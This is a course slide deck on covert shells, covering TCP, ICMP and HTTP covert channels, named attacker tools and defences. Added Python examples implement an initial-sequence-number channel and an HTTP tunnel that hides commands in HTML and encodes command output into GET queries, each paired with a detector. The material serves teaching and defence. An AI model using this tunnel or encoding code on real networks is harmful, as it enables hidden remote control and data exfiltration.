Covert Shells - PowerPoint PPT Presentation

1
Covert Shells
  • Lt(N) Paul La Hay
  • EE 579
  • 13 Mar 06

2
Overview
  • Definitions
  • History
  • Different Methods
  • Tools
  • Prevention Techniques

3
Definitions
  • Covert Channel
  • Any communication channel that can be exploited
    by a process to transfer information in a manner
    that violates the system's security policy. (DoD)
  • Steganography
  • The process of hiding data inside a carrier file
    by altering bits in a way that does not
    perceptibly change the carrier
  • Typically done in graphics, sound and executable
    files
  • Very hard to detect without a reference copy of
    the carrier or a known signature of the tool

4
Steganography
  • normal-looking HTML here ...
  • SYS_COMMAND: dir c:\secret_files\*.doc
  • ...

5
Ancient History
6
More Ancient History
  • Acrostic
  • Some form of text (e.g. a poem) where the author
    and reader agree that a specific recurring
    feature within the text spells out another message

7
Modern History
  • Covert shells began as commercial ventures to get
    peer-to-peer traffic past firewalls and security
    settings
  • Morpheus and Gnutella
  • The technique was then taken over by spyware

8
Where are Covert Shells?
  • HTTP traffic
  • Ping and ping responses (ICMP echo request/reply)
  • TCP/IP header fields, e.g. the sequence number
    used in the three-way handshake

9
How do they get on the system?
  • Back door listeners
  • Buffer overflows
  • Trojans, worms, viruses and spyware
  • Ex-employees can install covert channels for
    lingering access
  • Physically installed

10
Bar Codes
  • Modern bar code
  • Lots of redundancy: the entire code can still be
    read correctly with up to 50% of the data missing

11
Computer systems
  • Data can be sent within TCP/IP packets using the
    same strategy as bar codes: put it where it is not
    expected and where nothing checks for it
  • Developers have left this gap: there are numerous
    locations within packets which are normally
    unused or optional
  • Prior arrangement between the client and server
    allows data to pass unnoticed

12
ASCII Message via TCP
  • 6 bits in the TCP header and 8 bits in the IGMP
    header are reserved for future use
  • Not intended for data transfer, and most devices
    on the path ignore their contents
  • Suppose Alice wants to send a message to Bob
  • Both have a prearranged key and an agreed location
    in the header in which to place the message

13
TCP Example
  Alice --> Bob : SYN (encoded ISN)
  Bob --> Alice : SYN/ACK
  Alice --> Bob : ACK
  • The message is sent alongside some superficial
    data transfer

14
TCP Example Part 2
  • Alice keeps starting the three-way handshake and
    resetting it until the whole message has been
    passed
  • Disadvantage: the constant establishing and
    tearing down of sockets can alert a trained
    observer
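
The handshake described on slides 13 and 14, worked through as an added example (this code is not from the slides or from any tool they cite). Alice puts one message byte in the top 8 bits of each SYN's initial sequence number and then resets the connection, Bob reads the byte back out of the header, and a sensor-side heuristic shows why the trained observer notices: the ISN high bytes produced by a real stack do not all land in the printable range. The segment layout, the random low 24 bits, the port numbers and the seed are assumptions of this example, and the TCP checksum is left at zero because no IP pseudo-header is built here.

```python
"""Added example (not from the slides): one message byte per TCP handshake,
carried in the high byte of the SYN's initial sequence number."""
import random
import struct

# sport, dport, seq, ack, data-offset/reserved, flags, window, checksum, urgent
TCP_HDR = "!HHIIBBHHH"
SYN, RST = 0x02, 0x04


def encode_isn(byte_value: int, rng: random.Random) -> int:
    """Message byte in the top 8 bits; the low 24 bits are random so successive
    ISNs still look varied (some implementations leave them zero, which is an
    even easier tell)."""
    return (byte_value << 24) | rng.getrandbits(24)


def build_segment(sport: int, dport: int, seq: int, flags: int) -> bytes:
    # data offset 5 words (20 bytes), reserved bits zero, window 8192;
    # checksum stays 0 in this constructed example (no IP pseudo-header)
    return struct.pack(TCP_HDR, sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0)


def parse_segment(raw: bytes) -> dict:
    sport, dport, seq, _ack, _off, flags, _win, _csum, _urg = struct.unpack(TCP_HDR, raw[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "flags": flags}


def alice_send(message: bytes, dport: int = 80, seed: int = 1) -> list:
    """One handshake per byte: a SYN with the encoded ISN, then a RST to tear
    it down, as on slide 14. Returns the raw segments in wire order."""
    rng = random.Random(seed)  # seeded only so the example is reproducible
    wire = []
    for i, b in enumerate(message):
        sport = 40000 + i            # assumed ephemeral port range
        isn = encode_isn(b, rng)
        wire.append(build_segment(sport, dport, isn, SYN))
        wire.append(build_segment(sport, dport, (isn + 1) & 0xFFFFFFFF, RST))
    return wire


def bob_receive(wire: list) -> bytes:
    """Bob reads the high byte of each SYN's ISN; the RSTs carry nothing."""
    return bytes((parse_segment(raw)["seq"] >> 24) & 0xFF
                 for raw in wire if parse_segment(raw)["flags"] & SYN)


def isn_channel_suspect(wire: list, min_syns: int = 8) -> bool:
    """Heuristic a sensor could apply per source host: a burst of SYNs whose
    ISN high bytes are all printable ASCII, or whose low 24 bits are all zero,
    is far too regular for a real ISN generator. Threshold is an assumption."""
    isns = [parse_segment(raw)["seq"] for raw in wire
            if parse_segment(raw)["flags"] & SYN]
    if len(isns) < min_syns:
        return False
    printable = all(0x20 <= (isn >> 24) <= 0x7E for isn in isns)
    zero_low = all(isn & 0xFFFFFF == 0 for isn in isns)
    return printable or zero_low
```

The heuristic needs a burst before it speaks: a single random ISN has roughly a 37% chance of a printable high byte, so eight in a row from one host is about 0.04% likely by accident, and every further SYN makes the accident less plausible.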

15
HTTP Tunnels
  • A user (or the implant on the client) requests a
    specific web page
  • The host is listening and sends covert information
    with the web page, which can initiate a backdoor
    or Trojan horse program on the client computer
  • This is a one-way conversation: the host only
    sends data to the client when the client requests
    the page

16
HTTP Tunnels Continued
  • The client sends a GET request to establish
    communication with the host
  • The host web page sends commands back hidden in
    the HTML document (steganography)
  • Data is transmitted with every GET, which can be
    scheduled at specific time intervals

17
Sample Request
  • GET /some_sub_dir/index.html HTTP/1.1
  • User-Agent: Mozilla/4.0
  • Host: 123.109.117.215
  • Connection: Keep-Alive

18
Sample Tunnel Command
  • HTTP/1.1 200 OK
  • Date: Mon, 06 Nov 2001 20:21:35 GMT
  • Server: Apache/1.3.6 (Unix)
  • Last-Modified: Fri, 03 Nov 2001 12:00:09 GMT
  • Accept-Ranges: bytes
  • Content-Length: 1000
  • Connection: Close
  • Content-Type: text/html
  • SYS_COMMAND: dir c:\secret_files\*.doc
  • normal-looking HTML here ...
  • IDENTIFIER TAG: Confirmed
  • ...

19
Covert Shell
  • Good URL
  • http://lc2.law13.hotmail.passport.com/cgi_bin/loginerr?curmboxF000000001a20d9351fd99bfbdd66c9715defff8069error4secnoreauthid2fs1cb_lang253dENct1008617408_langENdomainhotmail2ecomutf80
  • Bad URL
  • http://119.124.155.107/p99377/rnad.srf?lc4105Pd6528ruhtQr_7982626_1265_shx3fmsu3d_673kkd/clo22300053fCnQs3d126msnruend3d1tw1000000kv2cbid6528ts_5dapassport.c?omr20.0248.1tpf9bf5474785dbfb620f5925b718cbc965
  • The bad URL is shaped to look like the Passport
    login traffic above, but it goes to a bare IP
    address and its query string is a long run of
    encoded data rather than login parameters
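
An added example that ties slides 15 to 19 together; it is not code from the slides or from Reverse WWW Shell. The master hides a command in an HTML comment of an ordinary page, the slave extracts it, returns the output in a GET whose query string imitates the login-error URL above, and a sensor scores the request on three cheap signals. The comment marker, the hex encoding, the parameter name `a`, the host pattern and the scoring thresholds are all assumptions of this example.

```python
"""Added example (not from the slides): HTTP tunnel command in an HTML comment,
output returned in a GET query string, and a request-scoring check."""
import math
import re
from urllib.parse import parse_qs, urlparse

MARKER = "SYS_COMMAND"   # marker as on slide 18; the comment wrapper is assumed
COMMENT_RE = re.compile(rb"<!--\s*" + MARKER.encode() + rb":\s*(.*?)\s*-->", re.S)


def make_tunnel_response(html: str, command: str) -> bytes:
    """Master side: an ordinary-looking page with the command in an HTML
    comment, which a browser never renders."""
    body = html.replace("</body>", f"<!-- {MARKER}: {command} -->\n</body>")
    head = ("HTTP/1.1 200 OK\r\n"
            "Server: Apache/1.3.6 (Unix)\r\n"
            f"Content-Length: {len(body.encode())}\r\n"
            "Content-Type: text/html\r\n\r\n")
    return head.encode() + body.encode()


def extract_command(response: bytes):
    """Slave side: split headers from body and pull the command out of the comment."""
    _head, _sep, body = response.partition(b"\r\n\r\n")
    m = COMMENT_RE.search(body)
    return m.group(1).decode() if m else None


def build_exfil_request(output: bytes, host: str) -> str:
    """Slave side: command output goes back hex-encoded in parameter 'a' of a
    URL shaped like the Passport login-error URL (parameter names assumed)."""
    query = f"curmbox=F000000001&a={output.hex()}&error=4"
    return (f"GET /cgi_bin/loginerr?{query} HTTP/1.1\r\n"
            f"Host: {host}\r\nUser-Agent: Mozilla/4.0\r\n\r\n")


def recover_exfil(request: str) -> bytes:
    """Master side: decode the output back out of the request line."""
    path = request.split("\r\n", 1)[0].split(" ")[1]
    return bytes.fromhex(parse_qs(urlparse(path).query)["a"][0])


def shannon_entropy(s: str) -> float:
    """Bits per character of the observed symbol distribution."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def suspicious_request(request: str, min_len: int = 64, min_entropy: float = 3.5) -> bool:
    """Sensor side: score a request and flag at 2 of 3 signals. Signals: the
    Host is a bare IP; a query value is long enough to carry data; that value
    has the entropy of encoded data. Thresholds are assumptions of this example."""
    lines = request.split("\r\n")
    path = lines[0].split(" ")[1]
    headers = dict(line.split(": ", 1) for line in lines[1:] if ": " in line)
    host = headers.get("Host", "")
    score = 1 if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) else 0
    values = [v for vs in parse_qs(urlparse(path).query, keep_blank_values=True).values()
              for v in vs]
    long_values = [v for v in values if len(v) >= min_len]
    if long_values:
        score += 1
        if any(shannon_entropy(v) >= min_entropy for v in long_values):
            score += 1
    return score >= 2
```

A real session token is also long and high-entropy, so the scoring is a lead rather than a verdict; in practice it is combined with the polling regularity from slide 16 and with how much query-string data one client sends to one host over time.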

20
Common Tools used by Attackers
  • Loki
  • Uses ping and ping responses
  • Wraps messages in ICMP
  • Daemonshell
  • Uses echo-reply packets because they are less
    likely to be blocked by firewalls
  • Attempts to be clandestine, but all data is sent
    in plaintext

21
More Tools
  • ICMP Backdoor
  • Not as robust as Loki
  • Uses smaller packets, which snoop characterizes as
    unidentified packets; tcpdump can still see the
    ICMP traffic
  • 007Shell
  • Requires root privileges
  • Pads packets to a multiple of 64 bytes so that
    they look like ordinary ping packets

22
More Tools
  • Reverse WWW Shell
  • Most common attack
  • The slave (client) sends command responses out via
    GET requests
  • The master (host) need not respond, which improves
    the camouflage
  • Host commands and client responses are both
    encrypted

23
Last Set of Tools
  • Bock
  • Communication data is transmitted in code,
    embedded in the source address of the IP header
  • Obsolete because most networks no longer allow
    spoofed source addresses through (anti-spoofing
    filters)
  • AckCmd
  • Provides a command shell on Windows 2000 systems
  • Uses TCP ACK segments, which elicit a TCP RESET
    from the remote side
  • Packets are not properly formatted for HTTP
  • Easily detectable if you know it is there

24
Summary of Tools
25
Defences
  • Network Defences
  • Current IDS can detect some fingerprints of
    covert channel applications/tools
  • IDS only alerts to the possible presence of a
    covert tool; the alert still has to be investigated
  • Host Defences
  • Prevent the attacker from gaining access
    (especially at root or admin level)
  • Hardened operating system with current security
    patches
  • Current anti-virus and anti-spyware applications
  • Make sure that no components have been added to
    web browsers
  • Be familiar with the processes running on machines

26
References
  • Daicos, C., Knight, G.S., "Concerning Enterprise
    Network Vulnerability To Http Tunnelling", IFIP
    TC11 18th International Conference on Information
    Security, Athens, May 2003
  • Owens, Mark, "A Discussion of Covert Channels and
    Steganography", SANS/GIAC GSEC 1.3, 19 March 2002.
    Retrieved March 4, 2006 from
    http://www.sans.org/rr/papers/download.php?id=678cfce5a5ba2bc11ff357d3658359aeb00b
  • Skoudis, Ed, Counter Hack Reloaded: A
    Step-by-Step Guide to Computer Attacks and
    Effective Defenses (2nd Edition), Prentice Hall,
    2005, ISBN 0-13-148104-5
  • Smith, J.C., "Covert Shells", 2000. Retrieved
    March 4, 2006 from
    http://www.giac.org/certified_professionals/practicals/GSEC/0186.php
  • U.S. Department of Defense, Trusted Computer
    System Evaluation Criteria (The Orange Book),
    DoD 5200.28-STD, Washington: GPO, 1985.
    http://www.radium.ncsc.mil/tpep/library/rainbow/5200.28-STD.html

27
Questions?